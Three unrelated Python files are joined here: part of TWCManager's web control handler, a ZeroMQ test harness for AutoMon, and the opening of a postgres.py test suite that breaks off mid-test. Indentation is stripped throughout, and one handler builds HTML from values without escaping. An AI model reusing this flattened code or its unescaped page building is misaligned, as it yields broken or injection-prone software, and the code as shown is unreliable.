master.queue_background_task({"cmd": "saveSettings"})
self.send_response(202)
self.end_headers()
self.wfile.write("".encode("utf-8"))
else:
# All other routes missed, return 404
self.send_response(404)
self.end_headers()
self.wfile.write("".encode("utf-8"))
self.debugLogAPI("Ending API POST")
def do_get_policy(self):
page = """
<table>
"""
j = 0
mod_policy = master.getModuleByName("Policy")
insertion_points = {0: "Emergency", 1: "Before", 3: "After"}
replaced = all(
x not in mod_policy.default_policy for x in mod_policy.charge_policy
)
for policy in mod_policy.charge_policy:
if policy in mod_policy.default_policy:
cat = "Default"
ext = insertion_points.get(j, None)
if ext:
page += "<tr><th>Policy Extension Point</th></tr>"
page += "<tr><td>" + ext + "</td></tr>"
j += 1
else:
cat = "Custom" if replaced else insertion_points.get(j, "Unknown")
page += (
"<tr><td> </td><td>"
+ policy["name"]
+ " ("
+ cat
+ ")</td></tr>"
)
page += "<tr><th> </th><th> </th><th>Match Criteria</th><th>Condition</th><th>Value</th></tr>"
for match, condition, value in zip(
policy["match"], policy["condition"], policy["value"]
):
page += "<tr><td> </td><td> </td>"
page += "<td>" + str(match)
match_result = mod_policy.policyValue(match)
if match != match_result:
page += " (" + str(match_result) + ")"
page += "</td>"
page += "<td>" + str(condition) + "</td>"
page += "<td>" + str(value)
value_result = mod_policy.policyValue(value)
if value != value_result:
page += " (" + str(value_result) + ")"
page += "</td></tr>"
page += """
</table>
</div>
</body>
"""
return page
def do_GET(self):
self.url = urllib.parse.urlparse(self.path)
# serve local static content files (from './lib/TWCManager/Control/static/' dir)
if self.url.path.startswith("/static/"):
content_type = mimetypes.guess_type(self.url.path)[0]
# only serve known content types
if content_type is not None:
filename = (
pathlib.Path(__file__).resolve().parent.as_posix()
+ self.url.path
)
# check if static file exists and is readable
if os.path.isfile(filename) and os.access(filename, os.R_OK):
self.send_response(200)
self.send_header("Content-type", content_type)
self.end_headers()
# send static content (e.g. images) to browser
with open(filename, "rb") as staticFile:
self.wfile.write(staticFile.read())
return
else:
# static file doesn't exist or isn't readable
self.send_response(404)
self.end_headers()
return
# Service API requests
if self.url.path.startswith("/api/"):
self.do_API_GET()
return
webroutes = [
{"route": "/debug", "tmpl": "debug.html.j2"},
{"route": "/schedule", "tmpl": "schedule.html.j2"},
{"route": "/settings", "tmpl": "settings.html.j2"},
{"route": "/teslaAccount/login", "error": "insecure"},
{"route": "/teslaAccount/mfaCode", "error": "insecure"},
{"route": "/teslaAccount/submitCaptcha", "error": "insecure"},
{"rstart": "/teslaAccount", "tmpl": "main.html.j2"},
{"rstart": "/vehicleDetail", "tmpl": "vehicleDetail.html.j2"},
{"route": "/vehicles", "tmpl": "vehicles.html.j2"},
]
if self.url.path == "/teslaAccount/getCaptchaImage":
self.send_response(200)
self.send_header("Content-type", "image/svg+xml")
self.end_headers()
self.wfile.write(master.getModuleByName("TeslaAPI").getCaptchaImage())
return
if self.url.path == "/":
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
# Load "main" template and render
self.template = self.templateEnv.get_template("main.html.j2")
# Set some values that we use within the template
# Check if we're able to access the Tesla API
self.apiAvailable = master.getModuleByName(
"TeslaAPI"
).car_api_available()
self.scheduledAmpsMax = master.getScheduledAmpsMax()
# Send the html message
page = self.template.render(vars(self))
self.wfile.write(page.encode("utf-8"))
return
# Match web routes to defined webroutes routing
route = None
for webroute in webroutes:
if self.url.path == webroute.get("route", "INVALID"):
route = webroute
break
elif self.url.path.startswith(webroute.get("rstart", "INVALID")):
route = webroute
break
if route and route.get("error", None):
if route["error"] == "insecure":
# For security, these details should be submitted via a POST request
# Send a 405 Method Not Allowed in response.
self.send_response(405)
self.end_headers()
page = (
    "This function may only be requested via the POST HTTP method."
)
self.wfile.write(page.encode("utf-8"))
return
else:
self.send_response(500)
self.end_headers()
self.wfile.write("".encode("utf-8"))
return
elif route:
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
# Load debug template and render
self.template = self.templateEnv.get_template(route["tmpl"])
page = self.template.render(self.__dict__)
self.wfile.write(page.encode("utf-8"))
return
if self.url.path == "/policy":
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
# Load policy template and render
self.template = self.templateEnv.get_template("policy.html.j2")
page = self.template.render(self.__dict__)
page += self.do_get_policy()
self.wfile.write(page.encode("utf-8"))
return
if self.url.path.startswith("/vehicles/deleteGroup"):
group = urllib.parse.unquote(self.url.path.rsplit("/", 1)[1])
if (
group
and len(group) > 0
and group in master.settings["VehicleGroups"]
):
del master.settings["VehicleGroups"][group]
master.queue_background_task({"cmd": "saveSettings"})
self.send_response(302)
self.send_header("Location", "/vehicles")
self.end_headers()
else:
self.send_response(400)
self.end_headers()
self.wfile.write("".encode("utf-8"))
return
if self.url.path == "/graphs" or self.url.path == "/graphsP":
# We query the last 24h by default
now = datetime.now().replace(second=0, microsecond=0)
initial = now - timedelta(hours=24)
end = now
# If we came from a POST, the dates are already stored in settings
if self.url.path == "/graphs":
self.process_save_graphs(
str(initial.strftime("%Y-%m-%dT%H:%M")),
str(end.strftime("%Y-%m-%dT%H:%M")),
)
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
# Load debug template and render
self.template = self.templateEnv.get_template("graphs.html.j2")
page = self.template.render(self.__dict__)
self.wfile.write(page.encode("utf-8"))
return
if self.url.path == "/graphs/date":
inicio = master.settings["Graphs"]["Initial"]
fin = master.settings["Graphs"]["End"]
self.process_graphs(inicio, fin)
return
# All other routes missed, return 404
self.send_response(404)
def do_POST(self):
# Parse URL
self.url = urllib.parse.urlparse(self.path)
# Parse POST parameters
self.fields.clear()
length = int(self.headers.get("content-length"))
self.post_data = self.rfile.read(length)
if self.url.path.startswith("/api/"):
self.do_API_POST()
return
self.fields = urllib.parse.parse_qs(self.post_data.decode("utf-8"))
if self.url.path == "/debug/save":
self.process_save_settings("debug")
return
if self.url.path == "/schedule/save":
# User has submitted schedule.
self.process_save_schedule()
return
if self.url.path == "/settings/save":
# User has submitted settings.
# Call dedicated function
self.process_save_settings()
return
if self.url.path == "/teslaAccount/login":
# User has submitted Tesla login.
# Pass it to the dedicated process_teslalogin function
self.process_teslalogin()
return
if self.url.path == "/teslaAccount/mfaCode":
transactionID = self.getFieldValue("transactionID")
mfaDevice = self.getFieldValue("mfaDevice")
mfaCode = self.getFieldValue("mfaCode")
resp = master.getModuleByName("TeslaAPI").mfaLogin(
transactionID, mfaDevice, mfaCode
)
self.send_response(302)
self.send_header("Location", "/teslaAccount/" + str(resp))
self.end_headers()
self.wfile.write("".encode("utf-8"))
return
if self.url.path == "/teslaAccount/submitCaptcha":
captchaCode = self.getFieldValue("captchaCode")
resp = master.getModuleByName("TeslaAPI").submitCaptchaCode(captchaCode)
self.send_response(302)
self.send_header("Location", "/teslaAccount/" + str(resp))
self.end_headers()
self.wfile.write("".encode("utf-8"))
return
if self.url.path == "/graphs/dates":
# User has submitted dates to graph this period.
objIni = self.getFieldValue("dateIni")
objEnd = self.getFieldValue("dateEnd")
if not objIni or not objEnd:
# Redirect back to graphs page if no Start or End time supplied
self.send_response(302)
self.send_header("Location", "/graphs")
else:
self.process_save_graphs(objIni, objEnd)
self.send_response(302)
self.send_header("Location", "/graphsP")
self.end_headers()
self.wfile.write("".encode("utf-8"))
return
if self.url.path == "/vehicle/groupMgmt":
group = self.getFieldValue("group")
op = self.getFieldValue("operation")
vin = self.getFieldValue("vin")
if op == "add":
try:
master.settings["VehicleGroups"][group]["Members"].append(vin)
except (KeyError, ValueError):
logger.error(
"Error adding vehicle %s to group %s" % (vin, group)
)
elif op == "remove":
try:
master.settings["VehicleGroups"][group]["Members"].remove(vin)
except (KeyError, ValueError):
logger.error(
"Error removing vehicle %s from group %s" % (vin, group)
)
master.queue_background_task({"cmd": "saveSettings"})
master.queue_background_task(
{
"cmd": "checkVINEntitlement",
"vin": vin,
}
)
self.send_response(302)
self.send_header("Location", "/vehicleDetail/" + vin)
self.end_headers()
self.wfile.write("".encode("utf-8"))
return
# All other routes missed, return 404
self.send_response(404)
self.end_headers()
self.wfile.write("".encode("utf-8"))
return
def addButton(self, button_def, extrargs):
# This is a macro which can display differing buttons based on a
# condition. It's a useful way to switch the text on a button based
# on current state.
params = {}
if len(button_def) == 3:
params = button_def[2]
buttontype = "Submit"
if params.get("buttonType", False):
buttontype = params["buttonType"]
page = "<input type='%s' %s id='%s' value='%s'>" % (
buttontype,
extrargs,
button_def[0],
button_def[1],
)
return page
def chargeScheduleDay(self, day):
# Fetch current settings
sched = master.settings.get("Schedule", {})
today = sched.get(day, {})
suffix = day + "ChargeTime"
# Render daily schedule options
page = "<tr>"
page += (
"<td>"
+ self.checkBox("enabled" + suffix, today.get("enabled", 0))
+ "</td>"
)
page += "<td>" + str(day) + "</td>"
page += (
"<td>"
+ self.optionList(
self.timeList,
{"name": "start" + suffix, "value": today.get("start", "00:00")},
)
+ "</td>"
)
page += "<td> to </td>"
page += (
"<td>"
+ self.optionList(
self.timeList,
{"name": "end" + suffix, "value": today.get("end", "00:00")},
)
+ "</td>"
)
page += (
"<td>" + self.checkBox("flex" + suffix, today.get("flex", 0)) + "</td>"
)
page += "<td>Flex Charge</td>"
page += "</tr>"
return page
def checkForUnsafeCharactters(self, text):
# Detect some unsafe characters in user input
# The intention is to minimize the risk of un-sanitized user input reaching the settings file
# or a database. We reject strings containing any of these characters.
unsafe_characters = '@#$%^&*"+<>;/'
if any(c in unsafe_characters for c in text):
return True
else:
return False
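# Example of the check above: a name like "Pool Pump" passes, while
# "<script>" is rejected because '<', '>' and '/' appear in the unsafe set.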
def getFieldValue(self, key):
# Parse the form value represented by key, and return the
# value either as an integer or string
keya = str(key)
try:
vala = self.fields[key][0].replace("'", "")
except KeyError:
return None
try:
if int(vala) or vala == "0":
return int(vala)
except ValueError:
return vala
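# Examples of the coercion above: "12" -> 12, "0" -> 0 (caught by the explicit
# == "0" test), and "00:30" -> "00:30" because int() raises ValueError and the
# original string is returned.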
def log_message(self, format, *args):
pass
def optionList(self, list, opts={}):
page = "<div class='form-group'>"
page += "<select class='form-control' id='%s' name='%s'>" % (
opts.get("name", ""),
opts.get("name", ""),
)
for option in list:
sel = ""
if str(opts.get("value", "-1")) == str(option[0]):
sel = "selected"
page += "<option value='%s' %s>%s</option>" % (
option[0],
sel,
option[1],
)
page += "</select>"
page += "</div>"
return page
def process_save_schedule(self):
# Check that schedule dict exists within settings.
# If not, this would indicate that this is the first time
# we have saved the new schedule settings
if master.settings.get("Schedule", None) == None:
master.settings["Schedule"] = {}
# Slight issue with checkboxes, you have to default them all to
# false, otherwise if one is unticked it is just not sent via form data
days = [
"Sunday",
"Monday",
"Tuesday",
"Wednesday",
"Thursday",
"Friday",
"Saturday",
]
for day in days:
if master.settings["Schedule"].get(day, None) == None:
master.settings["Schedule"][day] = {}
master.settings["Schedule"][day]["enabled"] = ""
master.settings["Schedule"][day]["flex"] = ""
# Detect schedule keys. Rather than saving them in a flat
# structure, we'll store them multi-dimensionally
fieldsout = self.fields.copy()
ct = re.compile(
r"(?P<trigger>enabled|end|flex|start)(?P<day>.*?)ChargeTime"
)
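# Example: a field named "startMondayChargeTime" matches with trigger="start"
# and day="Monday", and ends up stored as
# master.settings["Schedule"]["Monday"]["start"].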
for key in self.fields:
match = ct.match(key)
if match:
# Detected a multi-dimensional (per-day) key
# Rewrite it into the settings array and delete it
# from the input
if master.settings["Schedule"].get(match.group(2), None) == None:
# Create dictionary key for this day
master.settings["Schedule"][match.group(2)] = {}
# Set per-day settings
master.settings["Schedule"][match.group(2)][
match.group(1)
] = self.getFieldValue(key)
else:
if master.settings["Schedule"].get("Settings", None) == None:
master.settings["Schedule"]["Settings"] = {}
master.settings["Schedule"]["Settings"][key] = self.getFieldValue(
key
)
# During Phase 1 (backwards compatibility) for the new scheduling
# UI, after writing the settings in the intended new format, we then
# write back to the existing settings nodes so that it is backwards
# compatible.
# Green Energy Tracking
master.settings["hourResumeTrackGreenEnergy"] = int(
master.settings["Schedule"]["Settings"]["resumeGreenEnergy"][:2]
)
# Scheduled amps
master.settings["scheduledAmpsStartHour"] = int(
master.settings["Schedule"]["Common"]["start"][:2]
)
master.settings["scheduledAmpsEndHour"] = int(
master.settings["Schedule"]["Common"]["end"][:2]
)
master.settings["scheduledAmpsMax"] = float(
master.settings["Schedule"]["Settings"]["scheduledAmpsMax"]
)
# Scheduled Days bitmap backward compatibility
master.settings["scheduledAmpsDaysBitmap"] = (
(1 if master.settings["Schedule"]["Monday"]["enabled"] else 0)
+ (2 if master.settings["Schedule"]["Tuesday"]["enabled"] else 0)
+ (4 if master.settings["Schedule"]["Wednesday"]["enabled"] else 0)
+ (8 if master.settings["Schedule"]["Thursday"]["enabled"] else 0)
+ (16 if master.settings["Schedule"]["Friday"]["enabled"] else 0)
+ (32 if master.settings["Schedule"]["Saturday"]["enabled"] else 0)
+ (64 if master.settings["Schedule"]["Sunday"]["enabled"] else 0)
)
# Save Settings
master.queue_background_task({"cmd": "saveSettings"})
self.send_response(302)
self.send_header("Location", "/")
self.end_headers()
self.wfile.write("".encode("utf-8"))
return
def process_save_settings(self, page="settings"):
# This function will write the settings submitted from the settings
# page to the settings dict, before triggering a write of the settings
# to file
for key in self.fields:
# If the key relates to the car API tokens, we need to pass these
# to the appropriate module, rather than directly updating the
# configuration file (as it would just be overwritten)
if (
key == "carApiBearerToken" or key == "carApiRefreshToken"
) and self.getFieldValue(key) != "":
carapi = master.getModuleByName("TeslaAPI")
if key == "carApiBearerToken":
carapi.setCarApiBearerToken(self.getFieldValue(key))
elif key == "carApiRefreshToken":
carapi.setCarApiRefreshToken(self.getFieldValue(key))
# Write setting to dictionary
master.settings[key] = self.getFieldValue(key)
# If Non-Scheduled power action is either Do not Charge or
# Track Green Energy, set Non-Scheduled power rate to 0
if int(master.settings.get("nonScheduledAction", 1)) > 1:
master.settings["nonScheduledAmpsMax"] = 0
master.queue_background_task({"cmd": "saveSettings"})
# If triggered from the Debug page (not settings page), we need to
# set certain settings to false if they were not seen in the
# request data - This is because Check Boxes don't have a value
# if they aren't set
if page == "debug":
checkboxes = [
"enableDebugCommands",
"spikeAmpsProactively",
"spikeAmpsReactively",
]
for checkbox in checkboxes:
if checkbox not in self.fields:
master.settings[checkbox] = 0
# Redirect to the index page
self.send_response(302)
self.send_header("Location", "/")
self.end_headers()
self.wfile.write("".encode("utf-8"))
return
def process_teslalogin(self):
# Check if we are skipping Tesla Login submission
if not master.teslaLoginAskLater:
later = False
try:
later = len(self.fields["later"][0])
except KeyError:
later = False
if later:
master.teslaLoginAskLater = True
if not master.teslaLoginAskLater:
# Connect to Tesla API
carapi = master.getModuleByName("TeslaAPI")
carapi.resetCarApiLastErrorTime()
try:
ret = carapi.apiLogin(
self.fields["email"][0], self.fields["password"][0]
)
except KeyError:
self.send_response(302)
self.send_header("Location", "/teslaAccount/NotSpecified")
self.end_headers()
self.wfile.write("".encode("utf-8"))
return
# Redirect to an index page with output based on the return state of
# the function
self.send_response(302)
self.send_header("Location", "/teslaAccount/" + str(ret))
self.end_headers()
self.wfile.write("".encode("utf-8"))
return
else:
# User has asked to skip Tesla Account submission for this session
# Redirect back to /
self.send_response(302)
self.send_header("Location", "/")
self.end_headers()
self.wfile.write("".encode("utf-8"))
return
def process_save_graphs(self, initial, end):
# Check that Graphs dict exists within settings.
# If not, this would indicate that this is the first time
# we have saved it
if master.settings.get("Graphs", None) == None:
master.settings["Graphs"] = {}
master.settings["Graphs"]["Initial"] = initial
master.settings["Graphs"]["End"] = end
return
def process_graphs(self, init, end):
# This function will query the green_energy SQL table
result = {}
# We will use a loaded logging module with query capabilities to build the graphs.
module = None
for candidate_module in master.getModulesByType("Logging"):
if candidate_module["ref"].getCapabilities("queryGreenEnergy"):
logger.log(
logging.INFO6,
"Logging module %s supports queryGreenEnergy",
candidate_module["name"],
)
module = candidate_module["ref"]
else:
logger.log(
logging.INFO6,
"Logging module %s does not support queryGreenEnergy",
candidate_module["name"],
)
# If we were unable to find a loaded Logging module with the capability to query
# values for graphs, return a HTTP error code
if not module:
self.send_response(400)
self.end_headers()
return
try:
result = module.queryGreenEnergy(
{
"dateBegin": datetime.strptime(init, "%Y-%m-%dT%H:%M"),
"dateEnd": datetime.strptime(end, "%Y-%m-%dT%H:%M"),
}
)
except Exception as e:
logger.exception("Excepcion queryGreenEnergy:")
data = {}
data[0] = {"initial": init, "end": end}
i = 1
while i < len(result):
data[i] = {
"time": result[i][0].strftime("%Y-%m-%dT%H:%M:%S"),
"genW": str(result[i][1]),
"conW": str(result[i][2]),
"chgW": str(result[i][3]),
}
i = i + 1
self.send_response(200)
self.send_header("Content-type", "application/json")
self.end_headers()
json_data = json.dumps(data)
try:
self.wfile.write(json_data.encode("utf-8"))
except BrokenPipeError:
logger.debug("Connection Error: Broken Pipe")
return
def debugLogAPI(self, message):
logger.debug(
message
+ " (Url: "
+ str(self.url.path)
+ " / IP: "
+ str(self.client_address[0])
+ ")"
)
return HTTPControlHandler
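# A minimal usage sketch (an assumption, not part of this module): the class
# returned above is a BaseHTTPRequestHandler subclass, so it would typically
# be served along these lines. The factory name CreateHTTPHandlerClass, the
# port and the way `master` is obtained are hypothetical.
#
#   from http.server import ThreadingHTTPServer
#   handler_class = CreateHTTPHandlerClass(master)
#   httpd = ThreadingHTTPServer(("0.0.0.0", 8080), handler_class)
#   httpd.serve_forever()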
|
test_utils_zmq_sockets.py
|
import traceback
import zmq
import time
import threading
import logging
from timeit import default_timer as timer
import numpy as np
from zmq import ContextTerminated, ZMQError
from zmq.utils.monitor import recv_monitor_message
from automon.common_node import State
logging = logging.getLogger('automon')
# Use ZMQ Client-Server pattern (https://zguide.zeromq.org/docs/chapter3/#The-Asynchronous-Client-Server-Pattern)
# between the coordinator and the nodes: the coordinator uses a ROUTER socket and the nodes use DEALER sockets.
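# Concretely, each node DEALER sets an identity before connect(), and the
# coordinator ROUTER sees every message as the multipart frame
# [identity, payload], replying with send_multipart([identity, payload])
# as done in run_coordinator() below.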
def event_monitor_client(monitor):
try:
while monitor.poll():
evt = recv_monitor_message(monitor)
if evt['event'] == zmq.EVENT_ACCEPTED:
logging.info("Event EVENT_ACCEPTED: {}".format(evt))
if evt['event'] == zmq.EVENT_DISCONNECTED:
logging.info("Event EVENT_DISCONNECTED: {}".format(evt))
break
if evt['event'] == zmq.EVENT_MONITOR_STOPPED:
logging.info("Event EVENT_MONITOR_STOPPED: {}".format(evt))
break
monitor.close()
logging.info("Event monitor thread done")
except (ContextTerminated, ZMQError):
# Something went wrong
monitor.close()
logging.info("Event monitor thread done due to context termination")
class NodeDataLoop(threading.Thread):
def __init__(self, context, condition, data_generator, host, port, node, node_idx, b_single_sample_per_round):
self.context = context
self.condition = condition
self.node_idx = node_idx
self.data_generator = data_generator
self.host = host
self.port = port
self.node = node
self.num_data_updates = 0
self.num_detected_full_sync = 0
self.b_single_sample_per_round = b_single_sample_per_round
threading.Thread.__init__(self)
def data_update(self, data_client, idx):
# TODO: should change these values according to the network latency and coordinator full sync time
lazy_sync_latency_seconds_first_time = 10
lazy_sync_latency_seconds = 1.0
full_sync_latency_seconds = 4.0
latency_diff_between_full_and_lazy_sync = full_sync_latency_seconds - lazy_sync_latency_seconds
if idx == self.node_idx:
local_vector = self.data_generator.get_local_vector(self.node_idx)
message_violation = self.node.update_data(local_vector)
if message_violation is not None and len(message_violation) > 0:
data_client.send(message_violation)
self.num_data_updates += 1
time.sleep(lazy_sync_latency_seconds_first_time + (self.num_data_updates - 1) * lazy_sync_latency_seconds + self.num_detected_full_sync * latency_diff_between_full_and_lazy_sync - (timer() - self.start_time))
if self.node.state == State.WaitForSync or self.node.state == State.SuspectWaitForSync:
if not self.b_single_sample_per_round and self.node.state == State.WaitForSync:
logging.info("Node " + str(self.node_idx) + ": detected " + str(self.node.state) + " after " + str(self.num_data_updates) + " data updates")
if self.b_single_sample_per_round:
logging.info("Node " + str(self.node_idx) + ": detected " + str(self.node.state) + " after " + str(self.num_data_updates) + " data updates")
self.num_detected_full_sync += 1
time.sleep(lazy_sync_latency_seconds_first_time + (self.num_data_updates - 1) * lazy_sync_latency_seconds + self.num_detected_full_sync * latency_diff_between_full_and_lazy_sync - (timer() - self.start_time))
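# Example of the pacing formula above: after the 3rd data update with one full
# sync already detected, the node sleeps until
# 10 + (3 - 1) * 1.0 + 1 * (4.0 - 1.0) = 15.0 seconds after start_time.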
def run(self):
data_client = self.context.socket(zmq.DEALER)
data_client.setsockopt(zmq.LINGER, 0)
monitor = data_client.get_monitor_socket()
t = threading.Thread(target=event_monitor_client, args=(monitor,))
t.start()
try:
identity = 'data_loop-%d' % self.node_idx
data_client.identity = identity.encode('ascii')
data_client.connect('tcp://' + self.host + ':' + str(self.port))
with self.condition:
self.condition.wait()
self.start_time = timer()
logging.info('Node data-loop client socket %s started' % identity)
# First data update after the sliding window of the node is full
self.data_update(data_client, self.node_idx)
# For the rest of the data rounds: read data from stream and update node local vector.
# In case of violation it will trigger the sync process with the coordinator.
while self.data_generator.has_next():
# Check if the monitor thread finished
if not t.is_alive():
break
_, idx = self.data_generator.get_next_data_point()
if self.b_single_sample_per_round:
self.data_update(data_client, idx)
else:
if idx == self.node_idx:
self.data_update(data_client, idx)
end = timer()
if self.data_generator.has_next():
logging.info("Node " + str(self.node_idx) + ": terminated by event monitor which detected the coordinator disconnected")
logging.info("Node " + str(self.node_idx) + ": the test took: " + str(end - self.start_time) + " seconds")
finally:
logging.info("Node " + str(self.node_idx) + ": data loop ended")
if t.is_alive():
data_client.disable_monitor()
t.join()
logging.info("Node " + str(self.node_idx) + ": disabled event monitor")
data_client.close()
logging.info("Node " + str(self.node_idx) + ": closed data_client socket")
def run_node(host, port, node, node_idx, data_generator, test_folder, b_single_sample_per_round=False):
logging.info("Node " + str(node_idx) + ": num_iterations " + str(data_generator.get_num_iterations()) + ", data_generator state " + str(data_generator.state))
condition = threading.Condition()
context = zmq.Context()
client = context.socket(zmq.DEALER)
client.setsockopt(zmq.LINGER, 0)
identity = '%d' % node_idx
client.identity = identity.encode('ascii')
client.connect('tcp://' + host + ':' + str(port))
logging.info('Node %s started' % identity)
try:
node_data_loop = NodeDataLoop(context, condition, data_generator, host, port, node, node_idx, b_single_sample_per_round)
node_data_loop.start()
# Send ready message to server socket
client.send("ready".encode())
# Wait for start message from the server socket
message = client.recv()
while message != b'start':
message = client.recv()
logging.info("Node " + str(node_idx) + " got start message from the coordinator")
# Signal the data loop to start
with condition:
condition.notify_all()
while True:
# Check if the data_loop thread finished
if not node_data_loop.is_alive():
break
event = client.poll(timeout=3000) # wait 3 seconds
if event == 0:
# Timeout reached before any events were queued
pass
else:
# Events queued within the time limit
message = client.recv()
if len(message) == 0:
logging.info("Node " + str(node_idx) + " socket closed")
break
message_out = node.parse_message(message)
if message_out is not None:
client.send(message_out)
# In a regular exit the data loop thread finishes, which causes the main thread to break the loop and get here
logging.info("Node " + str(node_idx) + ": main loop ended after data loop ended")
finally:
logging.info("Node " + str(node_idx) + ": main loop ended")
with condition:
condition.notify_all()
node_data_loop.join()
client.close()
logging.info("Node " + str(node_idx) + ": closed client socket")
context.destroy()
node.dump_stats(test_folder)
def init_client_socket(node_idx, host='127.0.0.1', port=6400):
context = zmq.Context()
client_socket = context.socket(zmq.DEALER)
client_socket.setsockopt(zmq.LINGER, 0)
identity = '%d' % node_idx
client_socket.identity = identity.encode('ascii')
client_socket.connect('tcp://' + host + ':' + str(port))
logging.info('Node %s started' % identity)
try:
# Send ready message to server socket
client_socket.send("ready".encode())
# Wait for start message from the server socket
message = client_socket.recv()
while message != b'start':
message = client_socket.recv()
logging.info("Node " + str(node_idx) + " got start message from the coordinator")
except Exception as e:
logging.info(traceback.format_exc())
return client_socket
def event_monitor_server(monitor):
num_connections = 0
num_disconnections = 0
try:
while monitor.poll():
evt = recv_monitor_message(monitor)
if evt['event'] == zmq.EVENT_ACCEPTED:
logging.info("Event EVENT_ACCEPTED: {}".format(evt))
num_connections += 1
if evt['event'] == zmq.EVENT_DISCONNECTED:
logging.info("Event EVENT_DISCONNECTED: {}".format(evt))
num_disconnections += 1
if num_disconnections == num_connections:
break
if evt['event'] == zmq.EVENT_MONITOR_STOPPED:
logging.info("Event EVENT_MONITOR_STOPPED: {}".format(evt))
break
monitor.close()
logging.info("Event monitor thread done")
except (ContextTerminated, ZMQError):
# If an error occurs in the coordinator, run_coordinator stops the experiment and terminates the ZeroMQ context.
# That termination raises this exception in this thread.
monitor.close()
logging.info("Event monitor thread done due to context termination")
def run_coordinator(coordinator, port, num_nodes, test_folder):
start_time = timer()
context = zmq.Context()
server = context.socket(zmq.ROUTER)
server.setsockopt(zmq.LINGER, 0)
server.bind('tcp://0.0.0.0:' + str(port))
logging.info("Coordinator server socket started")
try:
monitor = server.get_monitor_socket()
t = threading.Thread(target=event_monitor_server, args=(monitor,))
t.start()
# Wait for ready message from all the node sockets
b_ready_nodes = np.zeros(num_nodes, dtype=bool)
while not np.all(b_ready_nodes):
ident, message = server.recv_multipart()
logging.info("Got message: " + message.decode() + " from node " + ident.decode())
if message == b'ready':
b_ready_nodes[int(ident)] = True
start_time = timer()
# After all node sockets are ready, send start signal to all the nodes to start the data loop
for node_idx in range(num_nodes):
server.send_multipart([str(node_idx).encode('ascii'), "start".encode()])
while True:
# Check if the monitor thread finished
if not t.is_alive():
break
event = server.poll(timeout=3000) # wait 3 seconds
if event == 0:
# Timeout reached before any events were queued
pass
else:
# Events queued within the time limit
ident, message = server.recv_multipart()
if len(message) == 0:
logging.info("Node " + ident.decode() + " socket closed")
messages_out = coordinator.parse_message(message)
for node_idx, message in messages_out:
server.send_multipart([str(node_idx).encode('ascii'), message])
# The monitor thread knows when all nodes have disconnected and exits. This causes the main thread to break out of the loop and get here.
server.close()
logging.info("Coordinator stopped by the monitor thread")
except Exception as e:
# Exception was thrown by the coordinator
logging.info("Coordinator stopped with an error")
logging.info(traceback.format_exc())
server.disable_monitor()
t.join()
logging.info("Coordinator : disabled event monitor")
finally:
server.close()
context.destroy()
end = timer()
logging.info("The test took: " + str(end - start_time) + " seconds")
coordinator.dump_stats(test_folder)
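# A minimal launch sketch (an assumption, not part of this module): the
# coordinator and the nodes are typically started as separate threads or
# processes, roughly as below. `coordinator`, `nodes` and `data_generators`
# are hypothetical names for objects provided by the AutoMon test harness.
#
#   threading.Thread(target=run_coordinator,
#                    args=(coordinator, 6400, len(nodes), test_folder)).start()
#   for idx, node in enumerate(nodes):
#       threading.Thread(target=run_node,
#                        args=('127.0.0.1', 6400, node, idx,
#                              data_generators[idx], test_folder)).start()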
|
tests.py
|
from collections import namedtuple
from threading import Thread
from unittest import TestCase
from postgres import (
AlreadyRegistered, NotAModel, NotRegistered, NoSuchType, NoTypeSpecified,
Postgres,
)
from postgres.cache import Cache
from postgres.cursors import (
BadBackAs, TooFew, TooMany,
Row, SimpleDictCursor, SimpleNamedTupleCursor, SimpleRowCursor, SimpleTupleCursor,
)
from postgres.orm import Model, ReadOnlyAttribute, UnknownAttributes
from psycopg2.errors import InterfaceError, ProgrammingError, ReadOnlySqlTransaction
from pytest import mark, raises
class Heck(Exception):
pass
# harnesses
# =========
class WithSchema(TestCase):
def setUp(self):
self.db = Postgres()
self.db.run("DROP SCHEMA IF EXISTS public CASCADE")
self.db.run("CREATE SCHEMA public")
def tearDown(self):
self.db.run("DROP SCHEMA IF EXISTS public CASCADE")
del self.db
class WithData(WithSchema):
def setUp(self):
WithSchema.setUp(self)
self.db.run("CREATE TABLE foo (bar text)")
self.db.run("INSERT INTO foo VALUES ('baz')")
self.db.run("INSERT INTO foo VALUES ('buz')")
# db.run
# ======
class TestRun(WithSchema):
def test_run_runs(self):
self.db.run("CREATE TABLE foo (bar text)")
actual = self.db.all("SELECT tablename FROM pg_tables "
"WHERE schemaname='public'")
assert actual == ["foo"]
def test_run_inserts(self):
self.db.run("CREATE TABLE foo (bar text)")
self.db.run("INSERT INTO foo VALUES ('baz')")
actual = self.db.one("SELECT * FROM foo ORDER BY bar")
assert actual == "baz"
def test_run_accepts_bind_parameters_as_keyword_arguments(self):
self.db.run("CREATE TABLE foo (bar text)")
self.db.run("INSERT INTO foo VALUES (%(bar)s)", bar='baz')
actual = self.db.one("SELECT * FROM foo ORDER BY bar")
assert actual == "baz"
# db.all
# ======
class TestRows(WithData):
def test_all_fetches_all_rows(self):
actual = self.db.all("SELECT * FROM foo ORDER BY bar")
assert actual == ["baz", "buz"]
def test_all_fetches_one_row(self):
actual = self.db.all("SELECT * FROM foo WHERE bar='baz'")
assert actual == ["baz"]
def test_all_fetches_no_rows(self):
actual = self.db.all("SELECT * FROM foo WHERE bar='blam'")
assert actual == []
def test_all_doesnt_choke_on_values_column(self):
actual = self.db.all("SELECT bar AS values FROM foo")
assert actual == ["baz", "buz"]
def test_bind_parameters_as_dict_work(self):
params = {"bar": "baz"}
actual = self.db.all("SELECT * FROM foo WHERE bar=%(bar)s", params)
assert actual == ["baz"]
def test_bind_parameters_as_tuple_work(self):
actual = self.db.all("SELECT * FROM foo WHERE bar=%s", ("baz",))
assert actual == ["baz"]
def test_bind_parameters_as_kwargs_work(self):
actual = self.db.all("SELECT * FROM foo WHERE bar=%(bar)s", bar='baz')
assert actual == ["baz"]
def test_all_raises_BadBackAs(self):
with self.assertRaises(BadBackAs) as context:
self.db.all("SELECT * FROM foo", back_as='foo')
assert str(context.exception) == (
"%r is not a valid value for the back_as argument.\n"
"The available values are: Row, dict, namedtuple, tuple."
) % 'foo'
# db.one
# ======
class TestWrongNumberException(WithData):
def test_TooFew_message_is_helpful(self):
try:
actual = self.db.one("CREATE TABLE foux (baar text)")
except TooFew as exc:
actual = str(exc)
assert actual == "Got -1 rows; expecting 0 or 1."
def test_TooMany_message_is_helpful_for_two_options(self):
